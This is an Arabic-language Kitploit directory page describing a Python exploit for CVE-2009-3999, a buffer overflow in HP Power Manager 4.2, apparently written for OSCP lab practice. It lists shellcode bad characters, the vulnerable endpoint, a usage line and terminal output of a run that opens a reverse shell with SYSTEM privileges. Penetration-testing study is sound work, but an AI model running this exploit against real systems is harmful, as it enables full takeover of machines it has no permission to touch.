Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2009-3999-HP-Power-Manager-4.2-Build-7-Buffer-Overflow — نص برمجي تلقائي مكتوب بلغة بايثون لـ CVE-2009-3999 | Kitploit
أدوات/GitHubGitHub/ac8999/cve-2009-3999-hp-power-manager-4.2-build-7-buffer-overflow
أطر الاستغلالتوليد الحمولةالاستغلالشيل كوداختبار الاختراقالتعلم والتعليمتوليد شيفرة القشرةاستغلال الملفات الثنائيةمختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubac8999/cve-2009-3999-hp-power-manager-4.2-build-7-buffer-overflow

CVE-2009-3999-HP-Power-Manager-4.2-Build-7-Buffer-Overflow

نص برمجي تلقائي مكتوب بلغة بايثون لـ CVE-2009-3999

عرض المستودع
2منذ 3 أشهرلم تتم المراجعة بعد

كجزء من تحضيري لشهادة OSCP، صادفت ثغرة CVE-2009-3999 (استغلال تجاوز سعة المخزن المؤقت لبرنامج HP Power Manager 4.2 (Build 7)).

تم تحديث هذا السكريبت الأخير لحل مشاكل التوافق مع Python 3 فيما يتعلق بمعالجة السلاسل والبايتات، مما يضمن إرسال الحمولة كبيانات ثنائية خام لتجنب إفساد الذاكرة.

تتميز هذه النسخة بتكامل تلقائي مع msfvenom لإنشاء شيلكود ديناميكي مع الأحرف الضارة الصحيحة (\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c)، وربطه بمتخصص Egghunter، وإرسال الحمولة النهائية عبر طلب POST إلى نقطة النهاية formExportDataLogs. صُممت للاستخدام التعليمي والتدقيق الأمني، مما يبسط سير عمل الاستغلال من خلال التعامل مع توليد الشيلكود وبدء المستمع تحت غطاء واحد.

root@kitploit:~
  usage: python3 CVE-2009-3999.py <TARGET-IP> <TARGET-PORT> <LHOST> <LPORT>
  
  ┌──(venv)─(root㉿user)-[/run/…/user/2024/HTBox/kevin]
  └─# python3 exp6.py 192.168.147.45 80 192.168.45.183 4444
  [*] Generating msfvenom payload for 192.168.45.183:4444...
  [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
  [-] No arch selected, selecting arch: x86 from the payload
  Found 11 compatible encoders
  Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
  x86/shikata_ga_nai failed with Encoding failed due to a nil character
  Attempting to encode payload with 1 iterations of x86/call4_dword_xor
  x86/call4_dword_xor succeeded with size 348 (iteration=0)
  x86/call4_dword_xor chosen with final size 348
  Payload size: 348 bytes
  Final size of python file: 1953 bytes
  [+] Sending exploit to 192.168.147.45:80
  [+] Exploit sent. Starting listener on 4444...
  listening on [any] 4444 ...
  connect to [192.168.45.183] from (UNKNOWN) [192.168.147.45] 49168
  Microsoft Windows [Version 6.1.7600]
  Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
  
  C:\Windows\system32>whoami
  whoami
  nt authority\system
تنزيل الأداة